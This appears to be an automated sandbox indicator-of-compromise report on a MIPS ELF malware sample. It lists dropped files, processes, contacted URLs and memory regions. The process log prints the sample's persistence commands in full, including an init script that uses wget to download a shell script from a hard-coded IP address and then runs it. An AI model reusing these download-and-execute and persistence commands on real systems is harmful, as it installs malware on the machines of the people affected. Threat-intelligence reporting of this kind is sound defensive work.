IOC Report
mips.nn.elf

Files

File Path | Type | Category | Malicious
mips.nn.elf | ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/mips.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped |
/etc/inittab | ASCII text | dropped |
/etc/motd | ASCII text | dropped |
/etc/systemd/system/custom.service | ASCII text | dropped |
/memfd:snapd-env-generator (deleted) | ASCII text | dropped |
/tmp/qemu-open.6Os42J (deleted) | ASCII text, with no line terminators | dropped |

Processes

Path | Cmdline | Malicious
/tmp/mips.nn.elf | /tmp/mips.nn.elf |
/tmp/mips.nn.elf | - |
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/systemctl | systemctl enable custom.service |
/tmp/mips.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/system |
/tmp/mips.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/system /etc/rcS.d/S99system |
/tmp/mips.nn.elf | - |
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf" |
/tmp/mips.nn.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/mips.nn.elf |
/tmp/mips.nn.elf | - |
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/mkdir | mkdir -p /etc/rc.d |
/tmp/mips.nn.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf |
/tmp/mips.nn.elf | - |
/tmp/mips.nn.elf | - |
/tmp/mips.nn.elf | - |
/tmp/mips.nn.elf | - |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/systemd/systemd | - |
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/libexec/gnome-session-binary | - |
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping |
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |

URLs

Name | IP | Malicious
http://94.156.227.233/curl.sh | unknown |
http://94.156.227.233/lol.sh | unknown |
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s | unknown |
http://94.156.227.233/ | unknown |

IPs

IP | Domain | Country | Malicious

Memdumps

Base Address | Region type | Protect | Malicious
7fcca4421000 | | page execute read | malicious
7fcd2a143000 | | page read and write |
7fcd29bf1000 | | page read and write |
7fcd24000000 | | page read and write |
55a7798c9000 | | page execute and read and write |
7fcd2a26c000 | | page read and write |
7fcca4467000 | | page read and write |
55a77aa9d000 | | page read and write |
7fcd2a274000 | | page read and write |
55a777639000 | | page execute read |
7fcca4462000 | | page read and write |
55a7778cb000 | | page read and write |
7ffddbe11000 | | page read and write |
55a7778c1000 | | page read and write |
7fcd24021000 | | page read and write |
7fcd29c31000 | | page read and write |
7fcd29592000 | | page read and write |
7fcd295a0000 | | page read and write |
55a7798e0000 | | page read and write |
7ffddbff1000 | | page execute read |
7fcd29850000 | | page read and write |
7fcd29c14000 | | page read and write |
7fcd2a2b9000 | | page read and write |
7fcd29f62000 | | page read and write |
7fcd28d8a000 | | page read and write |